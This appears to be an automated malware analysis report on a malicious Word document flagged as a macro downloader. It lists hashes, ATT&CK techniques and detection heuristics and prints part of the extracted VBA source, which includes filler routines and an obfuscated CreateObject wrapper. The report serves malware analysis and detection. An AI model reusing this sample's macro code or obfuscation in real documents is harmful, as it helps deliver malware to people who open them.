Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce70591644f59702…

MALICIOUS

Office (OLE)

641.5 KB Created: 2020-01-20 10:54:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: e4adc17db92f475e78fa420275f0dafc SHA-1: 680a376f0f135a616999d4254e142c3f77098ff6 SHA-256: ce70591644f59702a8bd2400b16faadc8225ce8dcce801b9cfb5b37ea25bc4d1
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. Heuristics indicate the use of CreateObject and CallByName, common for executing malicious code. The ClamAV detection 'Doc.Downloader.Powdow-7643936-0' strongly suggests a downloader functionality. The VBA macros likely download and execute a second-stage payload, aligning with the downloader pattern.

Heuristics 5

  • ClamAV: Doc.Downloader.Powdow-7643936-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powdow-7643936-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8910 bytes
SHA-256: 6c7e92db8fc0c321e066ac92b08a734775a83885a425fc9ad97837810ceb72bb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Medasco As String
Private Vedfol As String
Private Lerdf As String
Private Masxcol As String
Public Nerdfoc As String


Private Sub InitializeDictionary()
    ' Create dictionary object (erases current dictionary)
    Set objTemplates = CreateObject("Scripting.Dictionary")
    objTemplates.CompareMode = vbTextCompare ' Not case-sensitive
End Sub



Private Sub testDictionary()
    
    Call InitializeDictionary
    
    objTemplates.Add "diabetes", "a1c is above goal"
    objTemplates.Add "cholesterol", "ldl is above goal"
    objTemplates.Add "hypertension", "bp is above goal"
    
    ' Print all templates in immediate window
    Dim shortcut As Variant
    For Each shortcut In objTemplates.keys
        'Debug.Print shortcut, objTemplates(shortcut)
    Next shortcut
    
End Sub



Public Function DictionaryExists() As Boolean
    If objTemplates Is Nothing Then
        DictionaryExists = False
    Else
        DictionaryExists = True
    End If
End Function



Sub selectNewWorksheets()
'
' selectNewWorksheets Macro
'
'
    ActiveDocument.Tables.Add Range:=Selection.Range, NumRows:=4, NumColumns:= _
        4, DefaultTableBehavior:=wdWord9TableBehavior, AutoFitBehavior:= _
        wdAutoFitWindow
    With Selection.Tables(1)
        If .Style <> "Table Grid" Then
            .Style = "Table Grid"
        End If
        .ApplyStyleHeadingRows = True
        .ApplyStyleLastRow = False
        .ApplyStyleFirstColumn = True
        .ApplyStyleLastColumn = False
        .ApplyStyleRowBands = True
        .ApplyStyleColumnBands = False
    End With
End Sub



Sub TakeCSVandAnalyse(fileName_StringPath)

'
' TakeCSVandAnalyse Macro
'
'
        
    Dim someString, stringToAdd As String
    Dim fileNo As Integer
    Dim TildeOrCommaSeparated, toDivide As String
    fileNo = 1
    
    strFile = fileName_StringPath '"C:\Users\matteo_montanari\Desktop\QuestionflashCardsxlsx.csv"
    
    TildeOrCommaSeparated = Right(fileName_StringPath, 3)
    

    
    With CreateObject("Scripting.FileSystemObject")
        someString = .OpenTextFile(strFile, 1).ReadAll
        GetLineCount = UBound(Split(.OpenTextFile(strFile, 1).ReadAll, vbNewLine))
    End With
     
    
    linesToAdd = 16 - (GetLineCount Mod 16)
  
    stringToAdd = " "
     
    If linesToAdd = 16 Then
    
    Else
    
        If TildeOrCommaSeparated = "csv" Then
             
             toDivide = Chr(44)
        Else
             toDivide = Chr(126)
        End If
        
       For Line = 1 To linesToAdd
            If Line = linesToAdd Then
            
                stringToAdd = stringToAdd + Chr(32) + toDivide + Chr(32) + " "
            
            Else
                stringToAdd = stringToAdd + Chr(32) + toDivide + Chr(32) + vbNewLine
            End If
            

       Next Line
        
        Open strFile For Output As #fileNo  'Open file for overwriting! Replace Output with Append to append
        Print #fileNo, Replace(someString + stringToAdd, Chr(147), Chr(10))
        Close #fileNo
    End If
    
   
 
End Sub


Private Function ulicdr(i As String, op As String) As Object
On Error GoTo ErrHandler
Set ulicdr = CreateObject(op)
Exit Function
ErrHandler:
Set ulicdr = CreateObject(i)
End Function



Sub ImportCSV(fileName_StringPath)
    Dim strFile As String
    Dim strLine As String
    Dim TildeOrCommaSeparated As String
    Dim arrWords() As String
    Dim arrParts() As String
    
    Dim LinearWords As Collection
    Set LinearWords = New Collection
    
    Dim lngNum As Long
    Dim lngCount As Long
    
    Dim Word_Found As Variant
    
    Dim ArrayReverser(1 To 4) As Integer
    ArrayReverser
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.